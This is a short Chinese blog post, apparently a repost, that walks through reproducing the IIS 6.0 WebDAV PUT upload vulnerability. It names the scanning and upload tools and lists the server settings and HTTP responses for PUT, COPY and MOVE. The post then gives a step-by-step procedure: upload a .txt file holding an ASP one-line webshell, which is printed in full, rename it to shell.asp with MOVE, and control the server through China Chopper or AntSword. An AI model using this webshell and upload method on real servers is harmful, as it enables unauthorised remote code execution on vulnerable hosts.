IIS6.0的PUT文件上传漏洞的复现
首条博客,文笔有限。
利用工具
1、IIS PUT Scaner By ZwelL
2、桂林老兵IIS写权限利用程序
----------------------------------------
1、IIS来宾用户对网站文件夹有写入权限
2、Web服务扩展:WebDAV—打勾
3、网站主目录:写入—打勾(可PUT)
4、网站主目录:脚本资源访问—打勾(可COPY、MOVE)
-----------------------------------------
1、IIS PUT Scaner
只要开启WebDAV,PUT都显示YES。无论是否可写入,该工具都无法写入。
2、IIS写权限利用程序
WebDAV未开启
HTTP/1.1 501 Not Implemented
PUT成功
HTTP/1.1 201 Created 或 HTTP/1.1 200 OK
PUT失败(网站主目录:写入—未打勾)
HTTP/1.1 403 Forbidden
PUT失败(IIS来宾用户没有写入权限)
HTTP/1.1 401 Unauthorized
COPY成功
HTTP/1.1 201 Created 或 HTTP/1.1 204 No Content
COPY失败(网站主目录:脚本资源访问—未打勾)
HTTP/1.1 207 Multi-Status
MOVE成功
HTTP/1.1 201 Created
MOVE失败(网站主目录:脚本资源访问—未打勾)
HTTP/1.1 207 Multi-Status
-----------------------------------------
1.搭建Windows server2003+IIS6.0环境
2.使用nc.exe监听工具查看是否拥有相关权限
cmd line输入目标IP
potions 输入协议版本
host 输入目标地址
3.使用iisPutscanner.exe工具查看目标主机是否允许PUT
键入目标IP
显示YES说明可以
4.使用IISwrite.exe工具对目标就行put提交
选择PUT模式,选择txt文件,文件内容为asp的一句话木马。
例:<%eval request("admin")%>
如果直接上传.asp,会出现识别不到的错误,所以先使用txt文件就行上传。
中间件无法直接处理.txt中的一句话木马,所以使用MOVE模式对已经上传的.txt就行复制重命名为.asp的文件。如图中MOVE命令的意思就是将test.txt复制重命名为shell.asp。
5.上菜刀或者蚁剑
完成。
可能遇到的问题:
1.上传完成后无法解析shell.asp文件
解决方法:
开启Active Server Pages扩展
如遇其他问题,请在评论区留言。
转自:https://www.cnblogs.com/Rcsec/archive/2004/01/13/8911024.html
如内容有误,欢迎评论区提出建议与意见。